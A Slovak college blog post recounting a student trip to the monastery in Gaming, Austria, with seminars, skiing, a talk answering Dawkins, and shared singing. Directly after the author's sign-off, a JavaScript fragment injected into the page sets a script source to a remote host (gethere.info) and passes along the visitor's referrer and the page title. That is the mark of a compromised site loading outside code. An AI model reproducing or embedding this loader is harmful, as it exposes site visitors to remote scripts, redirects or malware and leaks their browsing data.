Študenti Kolégia majú úspešne za sebou už tradičný výlet do Gamingu

Rok štúdia v Kolégiu rovná sa roku jedinečných možností. Stretávanie sa s jedinečnými ľuďmi, účasť na jedinečných prednáškach a seminároch a navštevovanie jedinečných miest.

Rakúsky Gaming je jedným zo skupiny jedinečných. Krásny vidiek, starý kláštor kartuziánskeho rádu, študijné a inšpiratívne prostredie. Prvý KAN víkend v letnom semestri sa konal práve tam.

 

V pondelok nás otec rektor vyprevadil s prianím bezpečnej cesty a príjemných dní a zveril nás do rúk otca dekana Juraja Šústa. Štyri autá a v nich trekové topánky, otepľováky a termo tričká, lyžiarky a lyže a kopa ruksakov. Hurá na cestu!

V Gamingu nás pred hlavným vchodom čakali študenti na čele so svojou profesorkou Jenny, ktorí sa ukážkovo starali nasledujúce dni o naše pohodlie a spokojnosť. Na výber sme mali viacero možností. Lyžovanie v neďalekom zimnom stredisku, účasť na lekciách a seminároch spolu so študentmi Franciscan university alebo kombinácia oboch. Kresťanské morálne princípy, metafyzika, kresťanské manželstvo, história civilizácie, sviatosti a mnohé iné. Špičkoví európski aj americkí učitelia a profesori oduševnene a zaujímavo hovorili o jednotlivých témach.

Okrem toho sme mohli vidieť, ako funguje samotný kláštor, zúčastniť sa sv. omší a vešpier, pozerať sa na dedinu z neďalekých vysokých hôr. Prekvapením bol určite špeciálny seminár, ktorý zorganizovali iba pre nás. Dr. Newton, učitel teológie, nám predstavil knihu od Richarda Dawkinsa – “The God Delusion”, predstavil nám argumenty tejto knihy a taktiež jeho vlastné protiargumenty, čím vyvrátil tézu Dawkinsa, že Boh neexistuje. Fantastický seminár, na konci ktorého bol dlho nekončiaci potlesk. Posledný spoločný večer nám zahraniční priatelia navarili večeru a pripravili zábavný program.

Po opadnutí trémy sa realizovali aj študenti z KANu. Dominika predviedla svoje muzikantské schopnosti pri sólovom speve slovenských ľudových piesní aj pri dirigovaní nášho zboru s piesňami Salvator mundi a Moja múdrosť. Mišo Páleník si zasa rozumel s američanom Philipom a zaspievali si anglickú pieseň a Valentín nezaprel svoj pozitívny vzťah k Fínsku a zaspieval si s Andrejom po fínsky. Čas plný smiechu, potleskov a radosti. A potom objatia pri lúčení. Uisťovanie, že v marci sa zasa vidíme v Ivanke pri Dunaji.

Mali sme jedinečný a krásny spoločný čas, priestor na hlbšie budovanie komunitného a duchovného piliera a taktiež vďaka seminárom priestor pre budovanie akademického piliera.

Čarovné dni a nové priateľstvá a pikoška na záver: Róbert Toth svojim výkonom jednoznačne porazil rodenú Američanku v hre Scrabble, ktorú hrali v anglickom jazyku.

-mh-s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

0 komentárov

Zanechajte komentár

Chcete sa pripojiť k diskusii?
Neváhajte prispieť!

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *